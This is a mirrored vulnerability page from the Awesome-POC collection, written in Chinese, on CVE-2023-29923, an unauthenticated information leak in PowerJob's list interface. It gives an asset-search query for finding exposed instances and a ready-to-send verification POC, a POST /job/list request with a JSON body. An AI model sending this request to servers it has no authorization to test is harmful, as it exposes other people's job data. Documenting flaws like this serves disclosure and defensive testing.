admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-06 19:38:09 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/PowerJob list 信息泄漏漏洞 CVE-2023-29923.md
Threekiii 11de4c1d47 update
2024-11-06 14:10:36 +08:00

533 B
Raw Blame History

PowerJob list 信息泄漏漏洞 CVE-2023-29923

漏洞描述

PowerJob list接口存在信息泄漏漏洞攻击者无需通过授权就可以访问授权的接口获取敏感数据。

漏洞影响

PowerJob

网络测绘

app="PowerJob"

漏洞复现

登陆页面

image-20230424163841725

验证POC

POST /job/list
Content-Type: application/json

{"appId":1,"index":0,"pageSize":10}

image-20230424163855220